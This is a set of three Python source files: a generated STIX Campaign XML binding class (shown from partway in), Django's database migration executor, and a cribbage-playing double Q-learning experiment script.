self.Description = Description
self.Short_Description = Short_Description
self.Names = Names
if Intended_Effect is None:
self.Intended_Effect = []
else:
self.Intended_Effect = Intended_Effect
self.Status = Status
self.Related_TTPs = Related_TTPs
self.Related_Incidents = Related_Incidents
self.Related_Indicators = Related_Indicators
if Attribution is None:
self.Attribution = []
else:
self.Attribution = Attribution
self.Associated_Campaigns = Associated_Campaigns
self.Confidence = Confidence
if Activity is None:
self.Activity = []
else:
self.Activity = Activity
self.Information_Source = Information_Source
self.Handling = Handling
self.Related_Packages = Related_Packages
def factory(*args_, **kwargs_):
if CampaignType.subclass:
return CampaignType.subclass(*args_, **kwargs_)
else:
return CampaignType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Title(self): return self.Title
def set_Title(self, Title): self.Title = Title
def get_Description(self): return self.Description
def set_Description(self, Description): self.Description = Description
def get_Short_Description(self): return self.Short_Description
def set_Short_Description(self, Short_Description): self.Short_Description = Short_Description
def get_Names(self): return self.Names
def set_Names(self, Names): self.Names = Names
def get_Intended_Effect(self): return self.Intended_Effect
def set_Intended_Effect(self, Intended_Effect): self.Intended_Effect = Intended_Effect
def add_Intended_Effect(self, value): self.Intended_Effect.append(value)
def insert_Intended_Effect(self, index, value): self.Intended_Effect[index] = value
def get_Status(self): return self.Status
def set_Status(self, Status): self.Status = Status
def get_Related_TTPs(self): return self.Related_TTPs
def set_Related_TTPs(self, Related_TTPs): self.Related_TTPs = Related_TTPs
def get_Related_Incidents(self): return self.Related_Incidents
def set_Related_Incidents(self, Related_Incidents): self.Related_Incidents = Related_Incidents
def get_Related_Indicators(self): return self.Related_Indicators
def set_Related_Indicators(self, Related_Indicators): self.Related_Indicators = Related_Indicators
def get_Attribution(self): return self.Attribution
def set_Attribution(self, Attribution): self.Attribution = Attribution
def add_Attribution(self, value): self.Attribution.append(value)
def insert_Attribution(self, index, value): self.Attribution[index] = value
def get_Associated_Campaigns(self): return self.Associated_Campaigns
def set_Associated_Campaigns(self, Associated_Campaigns): self.Associated_Campaigns = Associated_Campaigns
def get_Confidence(self): return self.Confidence
def set_Confidence(self, Confidence): self.Confidence = Confidence
def get_Activity(self): return self.Activity
def set_Activity(self, Activity): self.Activity = Activity
def add_Activity(self, value): self.Activity.append(value)
def insert_Activity(self, index, value): self.Activity[index] = value
def get_Information_Source(self): return self.Information_Source
def set_Information_Source(self, Information_Source): self.Information_Source = Information_Source
def get_Handling(self): return self.Handling
def set_Handling(self, Handling): self.Handling = Handling
def get_Related_Packages(self): return self.Related_Packages
def set_Related_Packages(self, Related_Packages): self.Related_Packages = Related_Packages
def get_version(self): return self.version
def set_version(self, version): self.version = version
def hasContent_(self):
if (
self.Title is not None or
self.Description is not None or
self.Short_Description is not None or
self.Names is not None or
self.Intended_Effect or
self.Status is not None or
self.Related_TTPs is not None or
self.Related_Incidents is not None or
self.Related_Indicators is not None or
self.Attribution or
self.Associated_Campaigns is not None or
self.Confidence is not None or
self.Activity or
self.Information_Source is not None or
self.Handling is not None or
self.Related_Packages is not None or
super(CampaignType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='Campaign', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='Campaign')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='Campaign'):
super(CampaignType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='Campaign')
# if 'xmlns' not in already_processed:
# already_processed.add('xmlns')
# xmlns = " xmlns:%s='%s'" % (self.xmlns_prefix, self.xmlns)
# lwrite(xmlns)
if 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
xsi_type = " xsi:type='%s:%s'" % (self.xmlns_prefix, self.xml_type)
lwrite(xsi_type)
if self.version is not None and 'version' not in already_processed:
already_processed.add('version')
lwrite(' version=%s' % (quote_attrib(self.version), ))
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='CampaignType', fromsubclass_=False, pretty_print=True):
super(CampaignType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Title is not None:
showIndent(lwrite, level, pretty_print)
lwrite('<%s:Title>%s</%s:Title>%s' % (nsmap[namespace_], self.gds_format_string(quote_xml(self.Title).encode(ExternalEncoding), input_name='Title'), nsmap[namespace_], eol_))
if self.Description is not None:
self.Description.export(lwrite, level, nsmap, namespace_, name_='Description', pretty_print=pretty_print)
if self.Short_Description is not None:
self.Short_Description.export(lwrite, level, nsmap, namespace_, name_='Short_Description', pretty_print=pretty_print)
if self.Names is not None:
self.Names.export(lwrite, level, nsmap, namespace_, name_='Names', pretty_print=pretty_print)
for Intended_Effect_ in self.Intended_Effect:
Intended_Effect_.export(lwrite, level, nsmap, namespace_, name_='Intended_Effect', pretty_print=pretty_print)
if self.Status is not None:
self.Status.export(lwrite, level, nsmap, namespace_, name_='Status', pretty_print=pretty_print)
if self.Related_TTPs is not None:
self.Related_TTPs.export(lwrite, level, nsmap, namespace_, name_='Related_TTPs', pretty_print=pretty_print)
if self.Related_Incidents is not None:
self.Related_Incidents.export(lwrite, level, nsmap, namespace_, name_='Related_Incidents', pretty_print=pretty_print)
if self.Related_Indicators is not None:
self.Related_Indicators.export(lwrite, level, nsmap, namespace_, name_='Related_Indicators', pretty_print=pretty_print)
for Attribution_ in self.Attribution:
Attribution_.export(lwrite, level, nsmap, namespace_, name_='Attribution', pretty_print=pretty_print)
if self.Associated_Campaigns is not None:
self.Associated_Campaigns.export(lwrite, level, nsmap, namespace_, name_='Associated_Campaigns', pretty_print=pretty_print)
if self.Confidence is not None:
self.Confidence.export(lwrite, level, nsmap, namespace_, name_='Confidence', pretty_print=pretty_print)
for Activity_ in self.get_Activity():
Activity_.export(lwrite, level, nsmap, namespace_, name_='Activity', pretty_print=pretty_print)
if self.Information_Source is not None:
self.Information_Source.export(lwrite, level, nsmap, namespace_, name_='Information_Source', pretty_print=pretty_print)
if self.Handling is not None:
self.Handling.export(lwrite, level, nsmap, namespace_, name_='Handling', pretty_print=pretty_print)
if self.Related_Packages is not None:
self.Related_Packages.export(lwrite, level, nsmap, namespace_, name_='Related_Packages', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('version', node)
if value is not None and 'version' not in already_processed:
already_processed.add('version')
self.version = value
super(CampaignType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Title':
Title_ = child_.text
Title_ = self.gds_validate_string(Title_, node, 'Title')
self.Title = Title_
elif nodeName_ == 'Description':
obj_ = stix_common_binding.StructuredTextType.factory()
obj_.build(child_)
self.set_Description(obj_)
elif nodeName_ == 'Short_Description':
obj_ = stix_common_binding.StructuredTextType.factory()
obj_.build(child_)
self.set_Short_Description(obj_)
elif nodeName_ == 'Names':
obj_ = NamesType.factory()
obj_.build(child_)
self.set_Names(obj_)
elif nodeName_ == 'Intended_Effect':
obj_ = stix_common_binding.StatementType.factory()
obj_.build(child_)
self.Intended_Effect.append(obj_)
elif nodeName_ == 'Status':
obj_ = stix_common_binding.ControlledVocabularyStringType.factory()
obj_.build(child_)
self.set_Status(obj_)
elif nodeName_ == 'Related_TTPs':
obj_ = RelatedTTPsType.factory()
obj_.build(child_)
self.set_Related_TTPs(obj_)
elif nodeName_ == 'Related_Incidents':
obj_ = RelatedIncidentsType.factory()
obj_.build(child_)
self.set_Related_Incidents(obj_)
elif nodeName_ == 'Related_Indicators':
obj_ = RelatedIndicatorsType.factory()
obj_.build(child_)
self.set_Related_Indicators(obj_)
elif nodeName_ == 'Attribution':
obj_ = AttributionType.factory()
obj_.build(child_)
self.Attribution.append(obj_)
elif nodeName_ == 'Associated_Campaigns':
obj_ = AssociatedCampaignsType.factory()
obj_.build(child_)
self.set_Associated_Campaigns(obj_)
elif nodeName_ == 'Confidence':
obj_ = stix_common_binding.ConfidenceType.factory()
obj_.build(child_)
self.set_Confidence(obj_)
elif nodeName_ == 'Activity':
obj_ = stix_common_binding.ActivityType.factory()
obj_.build(child_)
self.Activity.append(obj_)
elif nodeName_ == 'Information_Source':
obj_ = stix_common_binding.InformationSourceType.factory()
obj_.build(child_)
self.set_Information_Source(obj_)
elif nodeName_ == 'Handling':
obj_ = data_marking_binding.MarkingType.factory()
obj_.build(child_)
self.set_Handling(obj_)
elif nodeName_ == "Related_Packages":
obj_ = stix_common_binding.RelatedPackageRefsType.factory()
obj_.build(child_)
self.set_Related_Packages(obj_)
super(CampaignType, self).buildChildren(child_, node, nodeName_, True)
# end class CampaignType
GDSClassesMapping = {}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout, 0, name_=rootTag,
# namespacedef_='',
# pretty_print=True)
return rootObj
def parseEtree(inFileName):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
rootElement = rootObj.to_etree(None, name_=rootTag)
content = etree_.tostring(rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement
def parseString(inString):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Campaign'
rootClass = CampaignType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
# sys.stdout.write('<?xml version="1.0" ?>\n')
# rootObj.export(sys.stdout, 0, name_="Campaign",
# namespacedef_='')
return rootObj
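# Typical usage of the parse helpers above (file name and XML text hypothetical):
#   root = parse('campaign-example.xml')   # build a CampaignType from a file
#   root = parseString(xml_text)           # build a CampaignType from a string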
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"NamesType",
"AssociatedCampaignsType",
"RelatedIndicatorsType",
"RelatedIncidentsType",
"RelatedTTPsType",
"AttributionType",
"CampaignType"
]
|
|
from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations, router
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
"""
End-to-end migration execution - loads migrations, and runs them
up or down to a specified set of targets.
"""
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
"""
Given a set of targets, returns a list of (Migration instance, backwards?).
"""
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
# If the target is (app_label, None), that means unmigrate everything
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
# If the migration is already applied, do backwards mode,
# otherwise do forwards mode.
elif target in applied:
# Don't migrate backwards all the way to the target node (that
# may roll back dependencies in other apps that don't need to
# be rolled back); instead roll back through target's immediate
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
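    # Example (hypothetical app and migration names): with only blog.0001
    # applied, targets of [('blog', '0002_auto')] would yield a plan of
    # [(<Migration blog.0002_auto>, False)], i.e. a single forwards step;
    # a target of ('blog', None) would instead produce backwards steps for
    # every applied blog migration.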
def _create_project_state(self):
return ProjectState(real_apps=list(self.loader.unmigrated_apps))
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
"""
Migrates the database up to the given targets.
        Django first needs to create all project states before a migration is
        (un)applied, and in a second step it runs all the database operations.
"""
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
# Nothing to do for an empty plan, except for building the post
# migrate project state
state = self._create_project_state()
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
state = self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
# No need to check for `elif all_backwards` here, as that condition
# would always evaluate to true.
state = self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
return state
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
"""
Take a list of 2-tuples of the form (migration instance, False) and
apply them in the order they occur in the full_plan.
"""
migrations_to_run = {m[0] for m in plan}
state = self._create_project_state()
applied_migrations = {
self.loader.graph.nodes[key] for key in self.loader.applied_migrations
if key in self.loader.graph.nodes
}
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
elif migration in applied_migrations:
# Only mutate the state if the migration is actually applied
# to make sure the resulting state doesn't include changes
# from unrelated migrations.
migration.mutate_state(state, preserve=False)
return state
def _migrate_all_backwards(self, plan, full_plan, fake):
"""
Take a list of 2-tuples of the form (migration instance, True) and
        unapply them in the reverse of the order in which they occur in
        the full_plan.
Since unapplying a migration requires the project state prior to that
migration, Django will compute the migration states before each of them
in a first run over the plan and then unapply them in a second run over
the plan.
"""
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = self._create_project_state()
applied_migrations = {
self.loader.graph.nodes[key] for key in self.loader.applied_migrations
if key in self.loader.graph.nodes
}
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps # Render all -- performance critical
# The state before this migration
states[migration] = state
                # The old state is kept as-is; we continue with the new state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
elif migration in applied_migrations:
# Only mutate the state if the migration is actually applied
# to make sure the resulting state doesn't include changes
# from unrelated migrations.
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
applied_migrations.remove(migration)
# Generate the post migration state by starting from the state before
# the last migration is unapplied and mutating it to include all the
# remaining applied migrations.
last_unapplied_migration = plan[-1][0]
state = states[last_unapplied_migration]
for index, (migration, _) in enumerate(full_plan):
if migration == last_unapplied_migration:
for migration, _ in full_plan[index:]:
if migration in applied_migrations:
migration.mutate_state(state, preserve=False)
break
return state
def collect_sql(self, plan):
"""
Takes a migration plan and returns a list of collected SQL
statements that represent the best-efforts version of that plan.
"""
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True, atomic=migration.atomic) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
"""
Runs a migration forwards.
"""
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
# Test to see if this is an already-applied initial migration
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
# Alright, do it normally
with self.connection.schema_editor(atomic=migration.atomic) as schema_editor:
state = migration.apply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
"""
Runs a migration backwards.
"""
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor(atomic=migration.atomic) as schema_editor:
state = migration.unapply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
"""
Mark replacement migrations applied if their replaced set all are.
We do this unconditionally on every migrate, rather than just when
migrations are applied or unapplied, so as to correctly handle the case
when a new squash migration is pushed to a deployment that already had
all its replaced migrations applied. In this case no new migration will
be applied, but we still want to correctly maintain the applied state
of the squash migration.
"""
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
"""
Tests whether a migration has been implicitly applied - that the
tables or columns it would create exist. This is intended only for use
on initial migrations (as it only looks for CreateModel and AddField).
"""
def should_skip_detecting_model(migration, model):
"""
No need to detect tables for proxy models, unmanaged models, or
models that can't be migrated on the current database.
"""
return (
model._meta.proxy or not model._meta.managed or not
router.allow_migrate(
self.connection.alias, migration.app_label,
model_name=model._meta.model_name,
)
)
if migration.initial is None:
# Bail if the migration isn't the first one in its app
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
existing_table_names = self.connection.introspection.table_names(self.connection.cursor())
# Make sure all create model and add field operations are done
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# main app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if should_skip_detecting_model(migration, model):
continue
if model._meta.db_table not in existing_table_names:
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# main app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if should_skip_detecting_model(migration, model):
continue
table = model._meta.db_table
field = model._meta.get_field(operation.name)
# Handle implicit many-to-many tables created by AddField.
if field.many_to_many:
if field.remote_field.through._meta.db_table not in existing_table_names:
return False, project_state
else:
found_add_field_migration = True
continue
column_names = [
column.name for column in
self.connection.introspection.get_table_description(self.connection.cursor(), table)
]
if field.column not in column_names:
return False, project_state
found_add_field_migration = True
# If we get this far and we found at least one CreateModel or AddField migration,
# the migration is considered implicitly applied.
return (found_create_model_migration or found_add_field_migration), after_state
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
expt.py
(c) Will Roberts 12 January, 2017
Training an AI to play cribbage.
'''
from __future__ import absolute_import, print_function
import functools
import itertools
import random
from cribbage.dqlearning import DQLearner
from cribbage.game import compare_players
from cribbage.netbuilder import ModelStore, Model, build, make_input_scaler
from cribbage.neural import discard_state_repr, record_both_player_states, record_player1_states
from cribbage.player import CribbagePlayer
from cribbage.randomplayer import RandomCribbagePlayer
from cribbage.utils import doubled, numpy_memoize, random_skip
import numpy as np
def random_discard_sars_gen(random_seed=None):
'''
Infinite generator over discard (state, action, reward,
next_state) tuples, using a random player. Produces about 2700
states per second on samarkand.
Arguments:
- `random_seed`:
'''
random.seed(random_seed)
player = RandomCribbagePlayer()
while True:
discard_states1, _pcs1, discard_states2, _pcs2 = record_both_player_states(player, player)
for state in discard_states1:
yield state
for state in discard_states2:
yield state
def random_discard_state_gen(random_seed=None):
'''
Infinite generator over discard states, using a random player.
Produces about 2700 states per second on samarkand.
Arguments:
- `random_seed`:
'''
for (state, _action, _reward, state2) in random_discard_sars_gen(random_seed):
yield state
if state2 is not None:
yield state2
# ------------------------------------------------------------
# Autoencode discard() states
def build_dautoenc():
'''Construct a single-layer discard() state autoencoder.'''
# models will be stored in the models/ directory
#store = ModelStore('models')
# create and configure a new model
dautoenc = Model('models', 'dautoenc')
# network architecture
dautoenc.input(295)
dautoenc.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc.output(295, 'rectify') # Dense
dautoenc.objective('squared_error')
dautoenc.update('adadelta')
dautoenc.update_args({}) # 'learning_rate': 1.0, 'rho': 0.95, 'epsilon': 1e-6
# build a validation set with fixed random state
val_set = list(itertools.islice(doubled(random_skip(random_discard_state_gen(42))), 500))
dautoenc.validation(val_set)
# training stream with non-fixed random state
stream = doubled(random_skip(random_discard_state_gen()))
dautoenc.training(stream)
# configure training loop
dautoenc.minibatch_size(500)
dautoenc.max_num_minibatches(65000)
dautoenc.validation_interval = 250 # about five minutes on samarkand
# build the model
build(dautoenc)
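# The resulting 295 -> 150 -> 295 bottleneck is reused below:
# build_dautoenc2() seeds its first hidden layer with the weights trained here.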
# ------------------------------------------------------------
# Two-layer discard() autoencoder
def build_dautoenc2():
'''Construct a two-layer discard() state autoencoder.'''
# create and configure a new model
dautoenc2 = Model('models', 'dautoenc2')
# network architecture
dautoenc2.input(295)
dautoenc2.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc2.hidden(150, 'rectify', dropout=0.2) # Dense
dautoenc2.output(295, 'rectify') # Dense
dautoenc2.objective('squared_error')
dautoenc2.update('adadelta')
# initialise weights on first layer
dautoenc = Model('models', 'dautoenc').load_snapshot(10000)
dautoenc2.set_weights('hidden1', dautoenc.get_weights('hidden1'))
# build a validation set with fixed random state
val_set = list(itertools.islice(doubled(random_skip(random_discard_state_gen(42))), 500))
dautoenc2.validation(val_set)
# training stream with non-fixed random state
stream = doubled(random_skip(random_discard_state_gen()))
dautoenc2.training(stream)
# configure training loop
dautoenc2.minibatch_size(500)
dautoenc2.max_num_minibatches(30000)
dautoenc2.validation_interval = 250 # about five minutes on samarkand
# build the model
build(dautoenc2)
# ------------------------------------------------------------
# Q-learning on discard()
def choose_discard_actions(qlearner_model, states_matrix):
'''
Given a Model with a Q-learning neural network in it, and a matrix
of N states, returns a vector of length N containing the argmax of
the network's outputs for each state (the action the network would
choose in that state).
Arguments:
- `qlearner_model`:
- `states_matrix`:
'''
if len(states_matrix) == 0:
return np.array([], dtype=int)
output = qlearner_model.compute(states_matrix)
# only consider those actions which are possible in the given hands
masked_output = np.ma.masked_array(output, mask=~states_matrix[:,1:53].astype(bool))
return masked_output.argmax(axis=1)
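# Illustrative example of the masking above (state layout assumed from the
# [:, 1:53] slice, i.e. columns 1..52 hold the card-in-hand bits): if only
# cards 2 and 5 are marked as present, the returned action is whichever of
# output columns 2 and 5 scores higher, even if some other column has the
# globally largest activation.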
class QLearningPlayer(CribbagePlayer):
'''A CribbagePlayer that plays using a Q-learned model.'''
def __init__(self, discard_model, play_card_model, epsilon):
'''
Constructor.
Arguments:
- `discard_model`:
- `play_card_model`:
- `epsilon`:
'''
super(QLearningPlayer, self).__init__()
self.discard_model = discard_model
self.play_card_model = play_card_model
self.epsilon = epsilon
def discard(self,
is_dealer,
hand,
player_score,
opponent_score):
'''Discard two cards from dealt hand into crib.'''
if self.discard_model is not None and random.random() > self.epsilon:
hand = hand[:]
hand2 = hand[:]
# choose the first card to discard
state = discard_state_repr(is_dealer,
hand,
None,
player_score,
opponent_score)
discard_value_1 = choose_discard_actions(self.discard_model, state[None, :])[0]
discard_idx_1 = hand.index(discard_value_1)
# remove the first discard from the hand and re-encode
del hand[discard_idx_1]
state = discard_state_repr(is_dealer,
hand,
discard_value_1,
player_score,
opponent_score)
discard_value_2 = choose_discard_actions(self.discard_model, state[None, :])[0]
discard_idx_2 = hand2.index(discard_value_2)
return [discard_idx_1, discard_idx_2]
return random.sample(range(6), 2)
def play_card(self,
is_dealer,
hand,
played_cards,
is_go,
linear_play,
player_score,
opponent_score,
legal_moves):
'''Select a single card from the hand to play during cribbage play.'''
if self.play_card_model is not None and random.random() > self.epsilon:
# TODO: integrate self.play_card_model
pass
return random.choice(legal_moves)
def dqlearner_vs_random(qlearner_model, _dummy_model):
'''
Plays a set of games between the Q-Learner player and a
    RandomPlayer, and returns the fraction of games that the Q-Learner player wins.
Arguments:
- `qlearner_model`: a Model object
'''
qplayer = QLearningPlayer(qlearner_model, None, epsilon=0.05)
stats = compare_players([qplayer, RandomCribbagePlayer()], 100)
return stats[0] / 100.
@numpy_memoize(ModelStore('models', ensure_exists=True).join('discard_scaling.npz'))
def get_discard_scaling():
'''
Estimates the mean and standard deviation of input vectors to the
discard() neural network.
'''
inputs = np.array(list(itertools.islice(random_discard_state_gen(), 100000)))
return inputs.mean(axis=0), inputs.std(axis=0)
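# Sketch of how the scaling is presumably consumed (an assumption; the actual
# behaviour lives in make_input_scaler, which is defined elsewhere):
#
#     mean, std = get_discard_scaling()
#     scaled_state = (raw_state - mean) / std   # standardise before the network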
# Q-learning model for discard()
def make_dqlearner(store, name):
'''
Builds a Q-learning model to learn how to discard.
Arguments:
- `store`: the ModelStore to store the Model in
- `name`: the name of the Q-learning model to create
'''
model = Model(store, name)
model.input(347)
model.hidden(150, 'rectify') # Dense
model.hidden(150, 'rectify') # Dense
model.output(52, 'linear') # Dense: top two activations indicate cards to play
model.objective('squared_error')
model.update('rmsprop')
model.update_args({'learning_rate': 0.002})
# normalise inputs to network
model.input_scaler(make_input_scaler(*get_discard_scaling()))
# validation will be performed by playing cribbage against a random
# player
model.minibatch_size(32)
model.validation_interval = 6000
return model
def record_player1_discard_sars_gen(model, epsilon):
'''
Returns an infinite generator of (s,a,r,s2) discard tuples by
playing the given model with the given epsilon value against a
random player.
Arguments:
    - `model`: the Model whose greedy policy player 1 follows
    - `epsilon`: exploration rate passed to the QLearningPlayer
'''
while True:
discard_states, _ = record_player1_states(
QLearningPlayer(model, None, epsilon=epsilon),
RandomCribbagePlayer())
for state in discard_states:
yield state
# ------------------------------------------------------------
# Double Q-Learning
def learn_discard():
'''
Main function: learn a model to perform cribbage discards using
Q-learning.
'''
# build the two q-learning networks
dqlearner_a = make_dqlearner('models', 'dqlearner_a9')
dqlearner_a.validation_routine(functools.partial(dqlearner_vs_random, dqlearner_a))
dqlearner_b = make_dqlearner('models', 'dqlearner_b9')
dqlearner_b.validation_routine(functools.partial(dqlearner_vs_random, dqlearner_a))
learner = DQLearner(dqlearner_a, dqlearner_b,
random_discard_sars_gen,
record_player1_discard_sars_gen)
# initialise replay memory with 50,000 (s,a,r,s) tuples from random play
learner.replay_memory_init_size(50000)
# 50k: 252M
# 100k: 360M
# 150k: 353M
# 200k: 414M
# 500k: 750M
# truncate replay memory at 500K (replay memory was 1M states in Mnih)
learner.replay_memory_max_size(500000)
# e-greedy with epsilon annealed linearly from 1.0 to 0.1 over first
# 1,000,000 minibatches, and 0.1 thereafter
learner.epsilon_fn(lambda n: max(1. + (0.1 - 1.) * n / 1000000., 0.1))
# on every training loop, sample 5K (s,a,r,s) discard states and store
# in the replay memory
learner.samples_per_loop(5000)
# make the training set 312 random minibatches (sampling with
# replacement) of 32 s,a,r,s tuples (this is roughly in line with
# Mnih's "Qhat estimator updated every 10,000 updates")
learner.minibatch_size(32)
learner.minibatches_per_loop(312)
learner.choose_action_fn(choose_discard_actions)
learner.train()
if __name__ == '__main__':
learn_discard()
# ------------------------------------------------------------
# Profiling
# In [8]: cProfile.run('loop(replay_memory, dqlearner_a, dqlearner_b)', sort='time')
# 822065 function calls in 2.806 seconds
# ncalls tottime percall cumtime percall filename:lineno(function)
# 315 0.921 0.003 1.523 0.005 function_module.py:754(__call__)
